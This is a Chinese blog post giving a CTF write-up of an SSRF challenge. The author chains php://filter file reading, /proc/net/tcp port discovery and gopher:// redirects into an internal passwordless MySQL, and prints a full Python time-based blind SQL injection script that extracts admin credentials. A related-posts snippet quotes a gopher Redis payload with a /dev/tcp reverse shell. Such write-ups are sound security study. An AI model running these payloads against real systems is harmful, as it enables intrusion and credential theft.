php mysql盲注_[题目]记一次利用gopher的内网mysql盲注

最新推荐文章于 2023-12-06 09:38:59 发布
最新推荐文章于 2023-12-06 09:38:59 发布
阅读量174 收藏
点赞数
文章标签: php mysql盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42560991/article/details/113474748
版权

进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的端口 2:curl没有回显

首先第一个问题我们直接去读取/proc/net/tcp看看本機的监听端口,发现一个80和一个1111,那毫无疑问1111就是mysql的端口了(端口以hex展示)

sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode

0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 62508910 1 0000000000000000 100 0 0 10 0

1: 00000000:0457 00000000:0000 0A 00000000:00000000 00:00000000 00000000 999 0 62513855 1 0000000000000000 100 0 0 10 0

2: 040011AC:0050 09000A0A:ACAA 01 00000000:00000000 00:00000000 00000000 33 0 62524723 1 0000000000000000 20 4 32 10 -1

在说操作mysql之前我们先构造好gopher协议下的mysql数据包,这里我用的是tcpdump监听本地3306端口后再用wireshark提取出需要的数据包

前置知识: tcp/ip方式连接mysql的过程(强行只说4.0以后的协议)

6747fbc7b289?utm_medium=reader_share&utm_content=note&utm_source=qq

image(图片来自https://segmentfault.com/a/1190000012166738)

所以我们需要3个包,一个是发送认证请求的包、一个发送我们query的包、一个quit包

这里还涉及到一个小知识是mysql的用户认证是采用了挑战应答的方式,由服务器生成一个挑战数发送给用户之后用户用挑战数加密密码返回给服务器,服务器检查结果是否与预期相同, 这里需要无授权mysql用户的原因就是如果密码为空的话挑战加密结果就是空, 这样的话认证数据包就能每次相同了

query包则相对结构简单,quit包格式固定

首先tcpdump -i lo0 -w mysql.pcap port 3306 -i网卡 -w导出到文件 然后本地马上TCP/IP方式连接数据库进行select操作, 最后exit

6747fbc7b289?utm_medium=reader_share&utm_content=note&utm_source=qq

11ea80a7-1e91-436c-a74d-cec9c0fff6db.png

将需要的请求包的原始数据(hex)拿下来之后转换成urlencoded的格式利用gopher协议访问 类似于这样:

6747fbc7b289?utm_medium=reader_share&utm_content=note&utm_source=qq

c229b719-80e1-4a82-9217-ab264e40be9b.png

返回到了我们期望的0

然后我们解决没有回显的问题:

方法一:采用带外攻击尝试利用dns查询带出去,推荐ceye.io (此方法不可用 经Gaia大佬的提醒 因为只有windows才有unc路径Orz..)

方法二:采用dumpfile的方式写文件到tmp目录后读取 (后来发现此mysql用户没有写权限)

方法三:最蠢的方法, 直接利用时间盲注 (最后用了这个方法)

然后最后一点需要注意的是在盲注的过程中数据包的长度会变化,要更改数据包包头长度

脚本:

import requests

import time

import os

url = 'http://70341201160745d19d1b8a9141e72eb87f773104453749c8.game.ichunqiu.com/index.php?page=send.php'

headers = {

'Host': '70341201160745d19d1b8a9141e72eb87f773104453749c8.game.ichunqiu.com',

'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:48.0) Gecko/20100101 Firefox/48.0',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Accept-Encoding': 'gzip, deflate',

'Referer': 'http://70341201160745d19d1b8a9141e72eb87f773104453749c8.game.ichunqiu.com/index.php?page=send.php',

'Cookie': 'Hm_lvt_1a32f7c660491887db0960e9c314b022=1503915500; Hm_lvt_9104989ce242a8e03049eaceca950328=1499841280,1499841321,1500792273; pgv_pvi=2458169344; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1509698028,1511583430,1511759905; UM_distinctid=1621015174e3f-07d3d76d358413-485860-384000-1621015174f3eb; PHPSESSID=p2aqa6ls1v5pvrlvt40599ino4',

'Connection': 'keep-alive',

'Upgrade-Insecure-Requests': '1',

}

remote = 1

se = requests.Session()

raw_conn = 'a400000105a6ff0100000001210000000000000000000000000000000000000000000000446f6700006d7973716c5f6e61746976655f70617373776f72640068035f6f73086f737831302e31330c5f636c69656e745f6e616d65086c69626d7973716c045f70696404353133300f5f636c69656e745f76657273696f6e06352e372e3231095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c'

# raw_select_db = '120000000353454c45435420444154414241534528290b00000002757365725f61646d696e'

raw_blind_query = '%s0000000373656c65637420696628617363696928737562737472282873656c6563742067726f75705f636f6e63617428757365726e616d652c70617373776f7264292066726f6d20757365725f61646d696e2e61646d696e292c%s2c3129293d%s2c736c6565702835292c3029'

raw_end_conn = '0100000001'

content = 'adminfla'

for x in xrange(8,100):

for y in xrange(33,126):

packet_length = 107

if x >= 10 :

packet_length += 1

if x >= 100:

packet_length += 1

if y >= 100 :

packet_length += 1

b = []

raw_code = (raw_conn + raw_blind_query + raw_end_conn) % (hex(packet_length)[2:], str(x).encode('hex'), str(y).encode('hex'))

# print raw_code

# exit()

l = len(raw_code)

for z in xrange(l):

if z % 2 == 0:

b.append(raw_code[z:z+2])

urlencoded = '%' + '%'.join(b)

# payload = 'gopher://127.0.0.1:1111/_' + urlencoded

if remote == 0:

payload = 'gopher://127.0.0.1:3306/_' + urlencoded

s = time.time()

os.system('curl ' + payload)

# print payload

# exit()

if time.time() - s >= 5:

print 'found! ' + chr(y)

break

else:

print y

elif remote == 1:

payload = 'gopher://127.0.0.1:1111/_' + urlencoded

with open('index.php','wb') as f:

f.write('<?php \nheader(\'Location:' + payload + '\');\n')

try:

s = time.time()

res = se.post(url, headers=headers, data={'url':'http://xxx.xxx.xxx.xxx'})

# print res.status_code

time.sleep(0.1);

if time.time() - s >= 5.1 and res.status_code == 200:

content += chr(y)

print 'Found!! ' + chr(y)

print content

break

else:

print y

except Exception as e:

pass

poc:

6747fbc7b289?utm_medium=reader_share&utm_content=note&utm_source=qq

f9945682-7cb0-4d63-be77-11febd8983f7.png

flag在admin表内

Omoo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 远程攻击_gopher 协议攻击内网 mysql
weixin_29480231的博客
01-19 272
本地测试一开始使用的是 centos 6.5 的虚拟机后来发现我的 curl 为 7.19.7 版本,不支持 gopher 协议但是都失败了..如果有 centos 6.5 升级 curl 版本成功的请告诉我!环境搭建失败了就只能慢慢的搭环境了,一时脑抽想体验一下 docker-compose,就去装了 dnmp(docker+nginx+mysql+php) 很棒的一个项目不过默认 php_cu...
gophermysql利用_gopher协议的攻击利用
weixin_32873435的博客
02-23 200
攻击内网redis攻击redis常见exp为:对应的gopher协议为:gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.2...
gopher攻击mysql_CTFweb类型(二十七)gophermysql利用及例题讲解
weixin_42462007的博客
02-05 293
本次来讲一下gopher协议在MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议的利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL利用:我这边创建一个demo,简单了...
gophermysql利用_从一道CTF题目Gopher攻击MySql
weixin_32394247的博客
02-23 102
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0×00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
php mysql盲注_注入学习(3) Mysql+php注入 基于bool和时间的盲注
weixin_30423065的博客
01-18 198
练习三:Mysql+php 基于bool和时间的盲注今天要用的函数(详细的直接看链接):left()函数:left()得到字符串左部指定个数的字符  left( string, n ) #string为要截取的字符串,n为长度limit()函数:标准定义找百度  limit(a,b) #我的理解 从第a个位置,截取b个数据if语句/if()函数:在MySQL中语法如下  if(a,b,c) #...
frog_gopher:一个用于Gopher精彩世界的服务器
05-18
FROG.TIPS GOPHER服务器 _ __,..---""-._ ';-, A GOPHER , _/_),-"` '-. `\\ IS BASICALLY \|.-"` -_) '. || A MOUSE, /` a , \ .'/ RIGHT??? '.___,__/ .-' \_ _.-'.' |\ \ \
gopher-php:一个用于 PHPGOPHER 读取和解析库
07-01
地鼠-php gopher-php 是一个库,可让您从 PHP 读取和解析 Gopher 文件。 这是我编写的一个库,目的是通过 Gopher 文件编写博客,但可以通过 HTTP 访问博客。 由于此库是为满足我自己的特定需求而编写的,因此就 ...
GopherServer-master_C#_Gopher_
09-29
GopherServer-master 是一个使用C#编程语言实现的Gopher协议服务器项目。Gopher是一种早期的互联网信息检索协议,它在TCP/IP协议栈上运行,主要用于提供文本菜单驱动的信息服务。Gopher协议在Web出现之前非常流行,...
MySQL基础.pdf
10-15
该资源清晰的讲述MySQL数据库的安装,卸载,MySQL数据库图形化软件的安装,各大数据库语言的分类,MySQL的基础语法
基于Swing+jdbc+mysql的Java图书管理系统
08-03
基于Swing+jdbc+mysql的Java图书管理系统 下载后,可直接用Eclipse或者IEDA打开 内含: 1、BookManager图书管理系统源码(含jdbcUtils工具类和驱动) 2、ER图 3、SQL数据库表
gophermysql利用及例题讲解
最新发布
DKPT的博客
12-06 124
查询语句(url编码)+url编码的登入请求。
gopher攻击mysql_[WEB安全] SSRF 利用 Gopher 协议拓展攻击面【转载】
weixin_30268555的博客
02-23 157
0x01 概述Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。gopher协议支持发出 GET、POST 请求:可以先截获 get 请求包和 post 请求包,再构造成符合 gopher 协议的请求。 gopher ...
gopher攻击mysql_gopher 协议在SSRF 中的一些利用
weixin_42131785的博客
02-05 1133
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
Nagini靶机之HTTP3协议、SSRF漏洞(Gopher + Mysql)、Joomla漏洞、SSH公钥登录、浏览器密码还原等利用方法
qq_40898302的博客
05-10 602
在snape用户下查看home路径,发现hermoine用户的主目录下有一个bin文件,bin文件下的su_cp文件拥有s权限,su_cp是copy的功能,并有hermoine所属权限。将abc生成一个md5值的密码,将joomla数据库中,joomla_users表中的site_admin的password字段的值更新为abc的MD5值。在hermoine的家目录存在.mozilla文件夹,他是存放浏览器的信息的文件夹下面存在firefox浏览器,通过工具去查看浏览器的账户密码。
mysql ssrf_ssrf攻击内网应用
weixin_36257799的博客
02-17 442
一、weblogic ssrf攻击redisWeblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进一步实现端口探测。该漏洞存在于/uddiexplorer/SearchPublicRegistries.jsp,我们使用burpsuite访问如下url进行测试。http://192.168.80.170:35402/uddiexplorer/SearchPublicRegis...
SSRF漏洞理解进阶&SSRF+gopher内网(redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8061
SSRF漏洞理解进阶&SSRF+gopher内网(redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
SSRF利用 Gopher |Gopher攻击mysql内网
crispr的博客
06-23 5149
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议之SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
mysql is fashion ctf_从一道CTF题目Gopher攻击MySql
weixin_29032337的博客
01-20 197
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 656
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
Gopher协议使用总结1
08-03
在技术层面上,Gopher支持GET和POST请求,这使得它能够被用于构造符合Gopher协议的网络请求,进而进行多种类型的内网攻击,如针对FTP、Telnet、Redis、Memcache等服务的渗透,甚至基于TCP包的exploit。Gopher的默认...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值